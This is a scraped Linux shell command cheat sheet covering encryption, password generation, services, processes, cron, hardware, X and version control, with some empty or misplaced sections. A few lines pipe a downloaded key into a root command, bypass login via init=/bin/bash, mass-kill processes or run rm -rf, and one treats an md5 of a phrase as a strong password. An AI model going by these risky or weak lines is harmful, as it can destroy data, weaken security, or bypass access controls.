 wget -q http://xyz.gpg -O- | sudo apt-key add -

encrypt the file 'log.txt'

 gpg -c log.txt

gpg encrypt a file

 gpg --encrypt --recipient 'Foo Bar' foo.txt

decrypt file

 gpg log.txt

encrypts or decrypts files in a specific directory

 for a in path/* ; do ccenrypt -K <password> $a; done

Passwords ‹↑›

Use md5 to generate a pretty hard to crack password

 echo "A great password" | md5sum

Generate a random password 30 characters long

 strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 30 | tr -d '\n'; echo

Hiding password while reading it from keyboard

 save_state=$(stty -g);echo -n "Password: ";stty -echo;read password;stty "$save_state";echo "";echo "You inserted $password as password"

generate a unique and secure password for every website that you

 sitepass() { echo -n "$@" | md5sum | sha1sum | sha224sum | sha256sum | sha384sum | sha512sum | gzip - | strings -n 1 | tr -d "[:space:]" | tr -s '[:print:]' | tr '!-~' 'P-~!-O' | rev | cut -b 2-11; history -d $(($HISTCMD-1)); }

Recovering Passwords ‹↑›

password recovery on debian

 init=/bin/bash; mount -o remount,rw /

Generating Passwords ‹↑›

generate random password

 pwgen -Bs 10 1

Password Generation

 pwgen --alt-phonics --capitalize 9 10

a homemade password generator

 genpass(){local i x y z h;h=${1:-8};x=({a..z} {A..Z} {0..9});for ((i=0;i<$h;i++));do y=${x[$((RANDOM%${#x[@]}))]};z=$z$y;done;echo $z ;}

Generate Random Passwords

 dd if=/dev/urandom count=200 bs=1 2>/dev/null | tr "\n" " " | sed 's/[^a-zA-Z0-9]//g' | cut -c-16

generate random password

 openssl rand -base64 6

Generate 10 pronunciable passwords

 apg -a 0 -n 10

password generator

 genpass() { local h x y;h=${1:-8};x=( {a..z} {A..Z} {0..9} );y=$(echo ${x[@]} | tr ' ' '\n' | shuf -n$h | xargs);echo -e "${y// /}"; }

generate random password

 tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c10

Creates a random password from /dev/urandom [0-9A-za-z]

 head -c $((<pw-lenght>-2)) /dev/urandom | uuencode -m - | sed -e '1d' -e '3d' | sed -e 's/=.*$//g'

Changing Passwords ‹↑›

force change password for all users

 for i in `cat /etc/passwd | awk -F : '{ print $1 }';`; do passwd -e $i; done

Services ‹↑›

'services' are a special type of process which are generally always running and are often started when the computer starts up. Examples of services are a web-server, an ftp server ...

www: debian:
sysvconfig allows a user to use the redhat-style 'service' command
show what services are available on the computer
 ls /etc/init.d

start or stop a service on a debian-style linux

 sudo /etc/init.d/servicename start|stop

restart the 'sshd' (secure shell) service

 sudo /etc/init.d/sshd restart

another way

 update-rc.d ... invoke-rc.d

stop the 'apache' service (with the sysvconfig package, or on redhat style)

 sudo service apache stop

other tools: rcconf, update-rc.d

Starting Services At Computer Start Up ‹↑›

Linux has a concept of 'run-levels' which are stages the computer reaches as it boots up, and as it shuts down. The higher the level the more 'booted-up' is. One can configure a server to start at any particular 'run-level'.

configure apache to start up when the computer starts

 update-rc.d apache2 defaults   this is debian-specific
 update-rc.d apache2 start 20 2 3 4 5 . stop 80 0 1 6 .  the same

disable the apache webserver from starting when the computer starts

 update-rc.d -f apache2 remove

create automatic startup links manually (this is the older way)

 cd /etc/rc5.d/
 ln -s /etc/init.d/apache2 S20apache2
# when the computer enters run-level 5 (rc5.d) is will start (S) the # 'apache2' service with a priority of '20', that is, before all other # services which have a priority number greater than 20

Pipes ‹↑›

The unix pipeline is possibly the most important concept in the unix world

cat large file to clipboard with speed-o-meter

 pv large.xml | xclip

Processes ‹↑›

At the heart of a unix-type operating system is the concept of the 'process'. Processes allow the computer to do more than one thing at a time.

Processes are essentially running programs (applications, software). Some applications, when they run, are visible because they use a 'window' or they display information or data on the command-line. However other processes are 'invisible'; that is, they are running, but you as the user doesnt see any visible activity.

Close shell keeping all subprocess running

 disown -a && exit

encryption tools
password gorilla - a graphical cross-platform encryption tool
gpg -
gpg2 -
cccrypt -
mcrypt - replacement for crypt unrecommends itself

Viewing Processes ‹↑›

It may be possible to view processes also with 'zenity' etc.

view processes (jobs) for only the current user/ shell


show information for all processes

 ps -e

display all your processes which have 'eave' in their name

 leave +30; ps | grep -v grep | grep -i eave

make a bash function 'pss' to display processes with 'ave' in the name

 pss(){ ps | grep -v grep | grep -i "$1"; }; pss ave

view all processes in real time


show verbose information for all processes, not just for the current user

 ps -ef
 ps aux  more or less the same

Show a 4-way scrollable process tree with full details.

 ps awwfux | less -S

Alias for displaying a process tree nicely

 alias pst='pstree -Alpha'; pst

show all processes in a 'tree' format (parent and child processes linked)


Displays process tree of all running processes

 pstree -Gap

Check if a process is running

 kill -0 <process-id>

order processes by cpu usage

 ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed "/^ 0.0 /d"

Show the 20 most CPU/Memory hungry processes

 ps aux | sort +2n | tail -20

show process numbers for the root user

 pgrep -u root

show running processes ordered by the amount of CPU usage

 ps -eo pcpu,pid,args | sort -n

show all processes using a directory/file/etc

 lsof | grep /Volumes/Lexar

sort all running processes by their memory & cpu usage

 ps aux --sort=%mem,%cpu

Managing Processes ‹↑›

ionice limits process I/O, to keep it from swamping the system

 ionice -c3 find /

Restart command if it dies.

 ps -C program_name || { program_name & }

Analysing Processes ‹↑›

Determining the excat memory usages by certain PID

 pmap -d [pid]

count processes with status "D" uninterruptible sleep

process tools
ps - the basic tool
top - views processes in real time
lsof - displays open files
pstree - a hierarchical tree display
pmap -
pgrep -

Find the processes that are on the runqueue. Processes with a

 ps -eo stat,pid,user,command | egrep "^STAT|^D|^R"

Pulls total current memory usage, including SWAP being used, by all processes

 ps aux | awk '{sum+=$6} END {print sum/1024}'

find out current working directory of a process

 echo COMMAND | xargs -ixxx ps -C xxx -o pid= | xargs -ixxx ls -l /proc/xxx/cwd

Show top running processes by the number of open filehandles they

 lsof | awk '{print $1}' | sort | uniq -c | sort -rn | head

Return threads count of a process

 ps -o thcount -p <process id>

List all process running on port 80

 sudo lsof -i :80

catch a process from a user and strace it.

 x=1; while [ $x = 1 ]; do process=`pgrep -u username`; if [ $process ]; then x=0; fi; done; strace -vvtf -s 256 -p $process

Killing Processes ‹↑›

In order to stop a running program (which doesnt have a window) it is necessary to 'kill' (or stop) the associated process. In order to do this first it may be necessary to find out the process identification number ('pid') of the running application.

start and then kill the 'leave' process using its exact name

 leave +20; killall -9 leave; ps

The command above will permanently stop ('kill') all processes which are named exactly 'leave', that is, all processes which were started by the 'leave' reminder program.

make a bash function 'psk' to kill processes with 'ave' in their name

 psk(){ ps | grep -v grep | grep -i "$1" | awk '{print $1;}' | xargs kill -9; }; psk ave

another way to kill a process using its name

 leave +20; pkill leave; ps

Kill a background job

 kill %1

Kills a process that is locking the file 'eg.txt'

 fuser -k eg.txt

find out the 'pid' number of a process associated with 'leave'

 leave +20; ps aux | grep leave

show the process id of a running program

 ls | at 1156; pidof at ; ps

you have to know the exact name of the program

Kill all processes that don't belong to root/force logoff

 for i in $(pgrep -v -u root);do kill -9 $i;done

Kill all processes belonging to a user

 ps -ef | grep $USERNAME | awk {'print $2'} | xargs kill [-9]

Kill all processes beloging to a single user.

 kill -9 `ps -u <username> -o "pid="`

Kill most recently created process with the name 'firefox'

 pkill -n firefox

kill all processes using a directory/file/etc

 lsof | grep /Volumes/Lexar | awk '{print $2}' | xargs kill

stop a program or process with 'sshd' in its name

 kill $(ps -ef | awk '/sshd/ { print $2 }')
 kill $(ps -ef | grep sshd | awk '{ print $2 }')   the same

trace the system calls made by a process (and its children)

 strace -f -s 512 -v ls -l

Zombie Processes ‹↑›

display all 'zombie' processese

 ps aux | awk '{ print $8 " " $2 " " $11}' | grep -w Z

Get a regular updated list of zombies

 watch "ps auxw | grep [d]efunct"

Get a regular updated list of zombies

 watch "ps auxw | grep 'defunct' | grep -v 'grep' | grep -v 'watch'"

Environment Configurations ‹↑›

show the values of the environment variables


Executes a command changing an environment variable 'var'

 var="value" command

For example ...

show what time and date it is in new york

 TZ=America/New_York date

Aliases ‹↑›

put aliases in the ~/.bashrc file to save them

 alias dir='ls -la | less'

Make alias pemanent fast

 PERMA () { echo "$@" >> ~/.bashrc; }

a variable can be used in an alias

 alias say='echo $1'   but alias say='echo $1; echo 1' doesnt work...

reload the .bashrc file to make a new alias take effect

 source ~/.bashrc

add a folder to the executable path (put in ~/.bash_profile file to save it)

 export PATH=/path/to/folder:"${PATH}"
programs in this folder can then be executed with 'programname'

make all terminals write to the same history file

 shopt -s histappend       put in .bashrc, on single user systems

enable changing to a folder by typing only the folder name (not path)

 export CDPATH='.:~:/some/folder:/path/to/folder'
place this in .bashrc with commonly used folders

Timing Performance ‹↑›

time how long a "grep" command takes to execute

 time grep -rl big *

time the execution time of 2 commands at the same time

 time { find / -name '*what*'; locate '*.cc' ; }

Scheduling ‹↑›

 top -b -n 1 | awk '{if (NR <=7) print; else if ($8 == "D") {print; count++} } END {print "Total status D: "count}'

At ‹↑›

retrieve the page '' at 12:00 oclock

 echo 'wget' | at 12:00

Schedule a script or command to run in 2 hours

 ( ( sleep 2h; your-command your-args ) & )

Execute a command at a given time

 echo "ls -l" | at midnight

Run a command only when load average is below a certain threshold

 echo "rm -rf /unwanted-but-large/folder" | batch

Cron ‹↑›

Cron is the traditional unix tool for scheduling tasks; that is for instructing the computer to automatically carry out a task at a given time, or at given intervals, without the user explicitly starting the task. Each task is placed in the 'crontab' file.

view the help page for the crontab file

 man 5 crontab

run the script '' every 15 mins past the hour

 */15 * * * * /usr/local/bin/  put this in the cron file

add the new entry in the file 'crontab' to the cron schedule,


update your system every day at lunch time (12:00)

 (crontab -e) 00 12 * * * apt-get update (/etc/init.d/cron restart)

edit the crontab file

 crontab -e

edit crontab

 vi ~/.crontab && crontab ~/.crontab

Log output from a cronjob to a file, but also e-mail if a string 2>&1 | tee -a output.log | grep -C 1000 ERROR

print crontab entries for all the users that actually have a file

 for USER in `cut -d ":" -f1 </etc/passwd`; do crontab -u ${USER} -l 1>/dev/null 2>&1; if [ ! ${?} -ne 0 ]; then echo -en "--- crontab for ${USER} ---\n$(crontab -u ${USER} -l)\n"; fi; done

Notifications ‹↑›

Set an alarm to wake up [2]

 echo "aplay path/to/song" | at [time]

Set an alarm to wake up

 sleep 5h && rhythmbox path/to/song

beep when a server goes offline

 while true; do [ "$(ping -c1W1w1 | awk '/received/ {print $4}')" != 1 ] && beep; sleep 1; done

Remind yourself to leave in 15 minutes

 leave +15

An alarm clock using xmms2 and at

 echo "xmms2 play" | at 6:00

Send pop-up notifications on Gnome

 notify-send ["<title>"] "<body>"

Will email when all Rsync processes have

 $(while [ ! -z "$(pgrep rsync)" ]; do echo; done; echo "rsync done" | mailx > /dev/null &

Run a long job and notify me when it's finished

 ./ && notify-send "Job finished"

Set audible alarm when an IP address comes online

 ping -i 60 -a IP_address

Notify me when users log in

 notifyme -C `cat /etc/passwd | cut -d: -f1`

display a (gtk) window with the text 'command finished'

 zenity --info --text="command finished!"

Alarms ‹↑›

A snooze button for xmms2 alarm clock

 xmms2 pause && echo "xmms2 play" | at now +5min

An alarm clock using xmms2 and at

 at 6:00 <<< "xmms2 play"

Databases ‹↑›

batch -
cron - a scheduling tools
crontab - a file of scheduled tasks
at - run a command at a certain time
nice - run with a certain priority

see the book: ''

Configuring Linux ‹↑›

popular database software
postgresql -
mysql -
berkeley db -

Get contents from hosts, passwd, groups

 getent [group|hosts|networks|passwd|protocols|services] [keyword]

set the default pager used for man pages

 update-alternatives --set pager /usr/bin/most

Environment variables etc

show the current path

 echo $PATH

The Operating System ‹↑›

Find distro name and/or version/release

 cat /etc/*-release

When was your OS installed?

 ls -lct /etc/ | tail -1 | awk '{print $6, $7, $8}'

Kernel ‹↑›

send kernel log (dmesg) notifications to root via cron

 (crontab -l; echo '* * * * * dmesg -c'; ) | crontab -

Short Information about loaded kernel modules

 awk '{print $1}' "/proc/modules" | xargs modinfo | awk '/^(filename|desc|depends)/'

Short Information about loaded kernel modules

 modinfo $(cut -d' ' -f1 /proc/modules) | sed '/^dep/s/$/\n/; /^file\|^desc\|^dep/!d'

find your release version of your ubuntu / debian distro

 lsb_release -a

When was your OS installed?

 ls -ldct /lost+found |awk '{print $6, $7}'

Modules ‹↑›

Modules in some cases serve the purpose of device drivers. In some cases they need to be compiled from source code, and then installed in the kernel with 'modprobe'.

Disable beep sound from your computer

 echo "blacklist pcspkr"|sudo tee -a /etc/modprobe.d/blacklist.conf

Swap Files ‹↑›

create an emergency swapfile when the existing swap space is too small

 sudo dd if=/dev/zero of=/swapfile bs=1024 count=1024000;sudo mkswap /swapfile; sudo swapon /swapfile

Hardware Configuration ‹↑›

set your ssd disk as a non-rotating medium

 sudo echo 0 > /sys/block/sdb/queue/rotational

32 bits or 64 bits?

 getconf LONG_BIT

Getting information about model no. of computer

 dmidecode | grep -i prod

print indepth hardware info

 sudo dmidecode | more

Generate the CPU utilization report

 sar -u 2 5

hard disk information - Model/serial no.

 hdparm -i[I] /dev/sda

Create an html page of information about your harddisk

 lshw -C disk -html > /tmp/diskinfo.html

Create a nifty html overview of the hardware in your computer

 lshw -html > hardware.html  'hardware.html' can be viewed in a browser

show the linux kernel version

 uname -r

show kernel startup messages


show usb devices


Modules And Device Drivers ‹↑›

In Linux, 'device drivers' (which make bits of hardware work) are also known as 'kernel modules'. If a piece of hardware is not working, then usually a kernel module must be loaded. This may involve; Find the product code for the device (looks like 0341:4561). Then find the module for that product. Then download the module source, compiling the module and installing it.

list your device drivers

 lspci -vv | less

show all loaded kernel modules


find module files in or below the current folder

 find . -name *.ko    kernel module files end in 'ko'

build the dependencies between various kernel modules

 depmod -a

load the 'rt3090sta' module (a wireless card driver)

 sudo modprobe rt3090sta

show pci devices


show ram memory information

 cat /proc/meminfo

show cpu information

 cat /proc/cpuinfo

Short information about loaded kernel modules

 lsmod | cut -d' ' -f1 | xargs modinfo | egrep '^file|^desc|^dep' | sed -e'/^dep/s/$/\n/g'

Short information about loaded kernel modules

 lsmod | sed -e '1d' -e 's/\(\([^ ]*\) \)\{1\}.*/\2/' | xargs modinfo | sed -e '/^dep/s/$/\n/g' -e '/^file/b' -e '/^desc/b' -e '/^dep/b' -e d

Lists installed kernels

 dpkg --get-selections | grep linux-image

Keyboard ‹↑›

Replace Caps-lock with Control-key

 xmodmap -e 'remove Lock = Caps_Lock' && xmodmap -e 'add control = Caps_Lock'

Change the console keyboard layout

 loadkeys uk

show all key and mouse events


Monitor ‹↑›

Give information about your graphic chipset

 lshw -C display

Show display adapter, available drivers, and driver in use

 lspci -v | perl -ne '/VGA/../^$/ and /VGA|Kern/ and print'

Devices ‹↑›

Ethernet Card ‹↑›

Get ethernet card information.

 ethtool eth0

Monitors ‹↑›

Configure second monitor to sit to the right of laptop

 xrandr --output LVDS --auto --output VGA --auto --right-of LVDS

Cdroms ‹↑›

Add audio CD to xmms2 playlist

 xmms2 addpls cdda://

Decreasing the cdrom device speed

 eject -x 4

limit the cdrom driver to a specified speed

 eject -x 8 /dev/cdrom

save a compressed copy of data from a cdrom

 gzip < /dev/cdrom > cdrom.iso.gz

rip audio tracks from CD to wav files in current dir

 cdparanoia -B

clear a rewritable compact disk (CDRW)

 cdrecord -v dev=/dev/cdrom blank=fast

Make audio CD from all wavs in current dir (see also cdrdao)

 cdrecord -v dev=/dev/cdrom -audio *.wav

how to copy cd/dvd onto the hard disk (.iso)

 dd if=/dev/cdrom of=whatever.iso

Burning Cds And Dvds ‹↑›

erase content from a cdrw

 cdrecord -v -blank=all -force

Create an ISO Image from a folder and burn it to CD

 hdiutil makehybrid -o CDname.iso /Way/to/folder ; hdiutil burn CDname.iso

burn an ISO image to writable CD

 wodim cdimage.iso

burn an iso to cd or dvd

 cdrecord -v path_to_iso_image.iso

add files to existing growable DVD using growisofs

 growisofs -M /dev/dvd -J -r "directory name with files to add to DVD"

Blank/erase a DVD-RW

 dvd+rw-format -force /dev/dvd1

Burn a directory of mp3s to an audio cd.

 alias burnaudiocd='mkdir ./temp && for i in *.[Mm][Pp]3;do mpg123 -w "./temp/${i%%.*}.wav" "$i";done;cdrecord -pad ./temp/* && rm -r ./temp'

backup your playstation game using rip

 cdrdao read-cd --read-raw --datafile FILE_NAME.bin --device /dev/cdrom --driver generic-mmc-raw FILE_NAME.toc

Scsi ‹↑›

Shows physically connected drives (SCSI or SATA)

 ls /sys/bus/scsi/devices

scan for new scsi devices

 echo "- - -" > /sys/class/scsi_host/host0/scan

Usb ‹↑›

remount a usb disk in gnome without physically removing and reinserting

 eject /dev/sdb; sleep 1; eject -t /dev/sdb

Get names of files in /dev, a USB device is attached to

 ls -la /dev/disk/by-id/usb-*

To relabel a usb thumb drive, first find out the type of file system on the drive.

update-alternatives - maintains default programs for tasks
getent - gets data from an adminstrative database

unmount the usb device before re-labeling it

 sudo umount /dev/sdb1

check the current device label

 sudo mlabel -i /dev/sdb1 -s ::

edit the mtools.conf file

 vim /etc/mtools.conf

relabel the drive

 mlabel p:newlabel

Cpu Central Processing Unit ‹↑›

List the CPU model name

 grep "model name" /proc/cpuinfo

List the CPU model name

 sed -n 's/^model name[ \t]*: *//p' /proc/cpuinfo

Xwindows ‹↑›

packages for relabeling usb thumb drives
FAT16 and FAT32 partitions use mtools.
NTFS partitions use ntfsprogs.
ext2 ext3, or ext4 partitions, use e2fsprogs.
JFS partitions use jfsutils.
ReiserFS (v3) partitions use reiserfsprogs.
XFS partitions use xfsprogs

Start an X app remotely

 ssh -f user@remote.ip DISPLAY=:0.0 smplayer movie.avi

Run any GUI program remotely

 ssh -fX <user>@<host> <program>

Send keypresses to an X application

 xvkbd -xsendevent -text "Hello world"

Click on a GUI window and show its process ID and command used to

 xprop | awk '/PID/ {print $3}' | xargs ps h -o pid,cmd

Start another X session in a window

 startx -- /usr/bin/Xephyr :2

The Clipboard ‹↑›

get xclip to own the clipboard contents

 xclip -o -selection clipboard | xclip -selection clipboard

copy the file list.xml to the clipboard

 cat list.xml | xclip

copoy a large file to the clipboard with a progress meter

 pv large.xml | xclip

print to standard output the text or data in the x clipboard

 xsel -o

If a piece of text is currently 'selected' or 'highlighted' in some window on the computer, then this text will be printed with 'xsel -o'

Kde ‹↑›

Kde is an alternative to 'gnome' and uses the qt windowing toolkit. qt is not a completely free toolkit.

Unlock your KDE4.3 session remotely

 qdbus org.kde.screenlocker /MainApplication quit

Gnome ‹↑›

Gnome uses the gtk windowing toolkit to draw its graphical user interfaces. gtk is a completely opensource toolkit.

User Interfaces ‹↑›

Read a keypress without echoing it

 stty cbreak -echo; KEY=$(dd bs=1 count=1 2>/dev/null); stty -cbreak echo

On screen display of command results

 date | osd_cat

Select Menus ‹↑›

The linux 'select' command is the simplest way of making a menu for the user to select from.

Whiptail And Dialog ‹↑›

Both whiptail and dialog create 'windows' in a console terminal.

Kdialog ‹↑›

Kdialog seems to be more or less equivalent to zenity for the KDE desktop.

Show a passive popup in KDE which times out in 30 seconds

 kdialog --passivepopup <text> 30

an SSH monitor using kdialog

 ssh root@server 'tail --max-unchanged-stats=10 -n0 -F /var/log/auth.log ' | grep Accepted | while read l ; do kdialog --title "SSH monitor" --passivepopup "$l" 3; done

Zenity ‹↑›

zenity is a simple way to present the user with a graphical user interface without needing to use a programming language. Zenity uses the gtk windowing library, so is aimed to the gnome linux desktop

Some other zenity examples.
display a window with a calender and output the chosen date
 zenity --calendar

allow the user to (graphically) choose a file

 zenity --file-selection --title 'select a file'

make a window with a list-box with the files from current folder

 ls | zenity --list --column="test"

try to jump to a folder with zenity

  find -type d -name '*er*' | zenity --list --column= | xargs cd

The file which the user selects in the list box is printed to the standard output.

display a text box and a label in a window

 zenity --title "Select Host" --entry --text "Select a server"

display a yes/no box with the question 'really quit now?'

 zenity --question --text "really quit now?"

show a question dialog and exit the script if the user says yes

 [ $(zenity --question --text "really quit?") ] && echo quiting && exit

show a notification icon in the gnome task bar

 zenity --notification --window-icon=update.png --text "System update necessary!"

Progress Bars With Zenity ‹↑›

show a progress bar while a command is executing

 find $HOME -name '*.mp3' | zenity --progress --pulsate

Checkboxes With Zenity ‹↑›

display a list with check boxes with the column labels

 zenity --list --checklist --column "Buy" --column "Item" TRUE Apples TRUE Oranges FALSE Pears FALSE Toothpaste

this writes 'Apples|Oranges' to standard out

Windows And Gui Applications ‹↑›

graphical applications which run with the gnome desktop.
open a file with its appropriate window application
 xdg-open file.txt

show the x window for a graphical app running on a remote computer

 ssh -X user@server.ext

Starting X ‹↑›

start X from a virtual console


run startx and redirect its output to a log file

 startx >$HOME/startx.log 2>&1

start X from a virtual console, and specify 16-bit color depth,

 startx -- -bpp 16

end your X session if you are running the fvwm2 window manager, click the left mouse button in the root window to pull up the start menu, and then choose Really quit? from the Exit Fvwm submenu.

end your X session if you are running the afterstep window manager, click the left mouse button in the root window to pull up the start menu, and then choose Really quit? from the Exit Fvwm submenu.

exit X immediately


run a digital clock from a shell window

 xclock -digital &

start a small xclock, 48 pixels wide and 48 pixels high

 xclock -geometry 48x48

start a large xclock, 480 pixels wide and 500 pixels high

 xclock -geometry 480x500

start an xclock with a width of 48 pixels and the default height

 xclock -geometry 48

start an xclock with a height of 48 pixels and the default width

 xclock -geometry x48

list the available colors

 xcolors  Press [Q] to exit xcolors.

switch to the desktop to the left of the current one while running fvw2,

  type [ALT]-[{<-]}.

switch to the desktop directly to the left of the current one while running afterstep,

  type [CTRL]-[{<-]}.

switch to the next-lowest video mode


switch to the next-highest video mode


change the root window color to blue violet

 xsetroot -solid blueviolet

tile the root window with a star pattern

 xsetroot -bitmap /usr/X11R6/include/bitmaps/star

tile the root window with a light slate gray star pattern on a black background

 xsetroot -fg slategray2 -bg black -bitmap /usr/X11R6/include/bitmaps/star

make the root window a gray color with no pattern

 xsetroot -gray
browse the system documentation files in the '/usr/doc' directory
 lynx /usr/doc

browse the system documentation files in the '/usr/doc' directory in Mozilla, type the following in Mozilla's Location window: file://usr/doc

find all files on the system that have 'audio' anywhere in their name

 locate audio

find all the files on the system whose file names end with the text 'ogg'

 locate *ogg

find all hidden "dotfiles" on the system

 locate /.

NOTE: locate searches are not case sensitive.

list all files on the system whose file name is 'top', regardless of case

 find / -iname top

list all files whose names begin with the three characters 'top' followed by exactly three more characters

 find / -name 'top???'

list all files in the current directory tree whose names have either the string 'net' or `comm' anywhere in their file names, type:

 find . -regex '.*\(net\|comm\).*'

list all files in the '/usr/local' directory tree that are greater than 10,000 kilobytes in size

 find /usr/local -size +10000k

list all files in your home directory tree less than 300 bytes in size

 find ~ -size -300b

list all files on the system whose size is exactly 42 512-byte blocks

 find / -size 42

find all empty files in your home directory tree

 find ~ -empty

list the files in the '/usr/local' directory tree that were modified exactly 24 hours ago

 find /usr/local -mtime 1

list the files in the '/usr' directory tree that were modified exactly five minutes ago

 find /usr -mmin 5

list the files in the '/usr/local' directory tree that were modified within the past 24 hours

 find /usr/local -mtime -1

list the files in the '/usr' directory tree that were modified within the past five minutes

 find /usr -mmin -5

list all of the files in your home directory tree that were modified yesterday

 find ~ -mtime 1 -daystart

list all of the files in the '/usr' directory tree that were modified one year or longer ago

 find /usr -mtime +356 -daystart

list all of the files in your home directory tree that were modified from two to four days ago

 find ~ -mtime 2 -mtime -4 -daystart

find files in the '/etc' directory tree that are newer than the file '/etc/motd'

 find /etc -newer /etc/motd

list all files in your home directory tree that were modified after May 4 of the current year

 touch -t 05040000 /tmp/timestamp
 find ~ -newer /tmp/timestamp

list all files in the '/usr/local/fonts' directory tree owned by the user warwick

 find /usr/local/fonts -user warwick

list all files in the '/dev' directory tree owned by the audio group

 find /dev -group audio

find all files in the '~/html/' directory tree with an `.html' extension, and output lines from these files that contain the string 'organic'

 find ~/html/ -name '*.html' -exec grep organic '{}' ';'

remove files from your home directory tree that were accessed more than one year after they were last modified, pausing to confirm before each removal

 find ~ -used +365 -ok rm '{}' ';'

list files in your home directory tree whose names begin with the string 'top', and that are newer than the file `/etc/motd', type:

 find ~ -name 'top*' -newer /etc/motd

compress all the files in your home directory tree that are two megabytes or larger, and that are not already compressed with gzip (having a '.gz' file name extension)

 find ~ -size +2000000c -regex '.*[^gz]' -exec gzip '{}' ';'

list the files in the current directory, with their attributes, sorted with the largest files first

 ls -lS

list the files in the current directory and their attributes, sorted from smallest to largest

 ls -lSr

output a list of the subdirectories of the current directory tree, sorted in ascending order by size

 du -S . | sort -n

output a list of the subdirectories in the current directory tree, sorted in descending order by size

 du -S . | sort -nr

output a list of the subdirectories in the '/usr/local' directory tree, sorted in descending order by size

 du -S /usr/local | sort -nr

output the number of files in the current directory

 ls | wc -l

count the number of files -- including dot files -- in the current directory

 ls -A | wc -l

list the number of files in the '/usr/share' directory tree, type:

 find /usr/share \! -type d | wc -l
list the number of files and directories in the '/usr/share' directory tree
 find /usr/share | wc -l
list the number of directories in the '/usr/share' directory tree
 find /usr/share \! -type f | wc -l

find out whether perl is installed on your system, and, if so, where it resides

 which perl  prints something like '/usr/bin/perl'

determine the format of the file '/usr/doc/HOWTO/README.gz',

 file /usr/doc/HOWTO/README.gz
/usr/doc/HOWTO/README.gz: gzip compressed data, deflated, original

determine the compression format of the file '/usr/doc/HOWTO/README.gz'

 file -z /usr/doc/HOWTO/README.gz

File Timestamps ‹↑›

change the timestamp of file 'pizzicato' to the current date and time

 touch pizzicato

change the timestamp of file 'pizzicato' to '17 May 1999 14:16'

 touch -d '17 May 1999 14:16' pizzicato

change the timestamp of file 'phone' to '14:16'

 touch -d '14:16' phone

split 'large.mp3' into separate files of one megabyte each, whose names begin with 'large.mp3.'

 split -b1m large.mp3 large.mp3.

reconstruct the original file from the split files

 cat large.mp3.* > large.mp3
 rm large.mp3.*

determine whether the files 'master' and `backup' differ

 cmp master backup

Version Control Systems ‹↑›

A version or revision control system is designed to keep track of different versions of a text document, or other file or files. These systems are often employed when writers or programmers want to be able to revert to a previous version of a document or code file.

Cvs ‹↑›

Override and update your locally modified files through cvs..

 cvs update -C

List only locally modified files with CVS

 cvs -Q status | grep -i locally

Subversion ‹↑›

Subversion is a reasonably modern versioning system which was supposed to replace 'cvs'.

Prints total line count contribution per user for an SVN

 svn ls -R | egrep -v -e "\/$" | xargs svn blame | awk '{print $2}' | sort | uniq -c | sort -r

Add new files/directory to subversion repository

 svn status | grep '^\?' | sed -e 's/^\?//g' | xargs svn add

Skip over .svn directories when using the "find" command.

 find . -not \( -name .svn -prune \)

Archive all SVN repositories in a platform independent form

 find repMainPath -maxdepth 1 -mindepth 1 -type d | while read dir; do echo processing $dir; sudo svnadmin dump --deltas $dir >dumpPath/`basename $dir`; done

Ignore a directory in SVN, permanently

 svn propset svn:ignore "*" tool/templates_c; svn commit -m "Ignoring tool/templates_c"

Add all files in current directory to SVN

 svn add --force *

Get a range of SVN revisions from svn diff and tar gz them

 tar cvfz changes.tar.gz --exclude-vcs `svn diff -rM:N --summarize . | grep . | awk '{print $2}' | grep -E -v '^\.$'`

get colorful side-by-side diffs of files in svn with vim

 vimdiff <(svn cat "$1") "$1"

sync svn working copy and remote repository (auto adding new

 svn status | grep '^?' | awk '{ print $2; }' | xargs svn add

Commit only newly added files to subversion repository

 svn ci `svn stat |awk '/^A/{printf $2" "}'`

Add all unversioned files to svn

 svn st | grep "^\?" | awk "{print \$2}" | xargs svn add $1

Add all files not under subversion control

 for i in $(svn st | grep "?" | awk '{print $2}'); do svn add $i; done;

Deleting Files from svn which are missing

 svn status | grep '!' | sed 's/!/ /' | xargs svn del --force

Have subversion ignore a file pattern in a directory

 svn propset svn:ignore "*txt" log/

output list of modifications for an svn revision

 svn log $url -r $revision -v | egrep " [RAMD] \/" | sed s/^.....//

Recursively Add Changed Files to Subversion

 svn status | grep "^\?" | awk '{print $2}' | xargs svn add

Output a list of svn repository entities to xml file

 svn list -R --xml >> svnxxmlinfo.xml

fetch all revisions of a specific file in an SVN repository

 svn log fileName|cut -d" " -f 1|grep -e "^r[0-9]\{1,\}$"|awk {'sub(/^r/,"",$1);print "svn cat fileName@"$1" > /tmp/fileName.r"$1'}|sh

Create subversion undo point

 function svnundopoint() { if [ -d .undo ]; then r=`svn info | grep Revision | cut -f 2 -d ' '` && t=`date +%F_%T` && f=${t}rev${r} && svn diff>.undo/$f && svn stat>.undo/stat_$f; else echo Missing .undo directory; fi }

gets all files committed to svn by a particular user since a given date

wmctrl - control a window manager from scripts

Git ‹↑›

This system seems to be used for linux development and apparently was written by Mr Torvalds himself after dissatisfaction with other tools

Add forgotten changes to the last git commit

 git commit --amend

Move all files untracked by git into a directory

 git clean -n | sed 's/Would remove //; /Would not remove/d;' | xargs mv -t stuff/

Show git branches by date - useful for showing active branches

 for k in `git branch|sed s/^..//`;do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" "$k"`\\t"$k";done|sort

List all authors of a particular git project

 git shortlog -s | cut -c8-

grep across a git repo and open matching files in gedit

 git grep -l "your grep string" | xargs gedit

Show (only) list of files changed by commit

 git show --relative --pretty=format:'' --name-only HASH

git remove files which have been deleted

 git add -u

Prints per-line contribution per author for a GIT repository

 git ls-files | xargs -n1 -d'\n' -i git-blame {} | perl -n -e '/\s\((.*?)\s[0-9]{4}/ && print "$1\n"' | sort -f | uniq -c -w3 | sort -r

github push-ing behind draconian proxies!

 git remote add origin git@SSH-HOST:<USER>/<REPOSITORY>.git

Display summary of git commit ids and messages for a given branch

 git log --pretty='format:%Cgreen%H %Cred%ai %Creset- %s'

Makes a project directory, unless it exists; changes into the dir,

 gitstart () { if ! [[ -d "$@" ]]; then mkdir -p "$@" && cd "$@" && git init; else cd "$@" && git init; fi }

Display summary of git commit ids and messages for a given branch

 git log master | awk '/commit/ {id=$2} /\s+\w+/ {print id, $0}'

Display condensed log of changes to current git repository

 git log --pretty=oneline

Undo several commits by committing an inverse patch.

 git diff HEAD..rev | git apply --index; git commit

Stage only portions of the changes to a file.

 git add --patch <filename>

Rcs An Old Version Control System ‹↑›

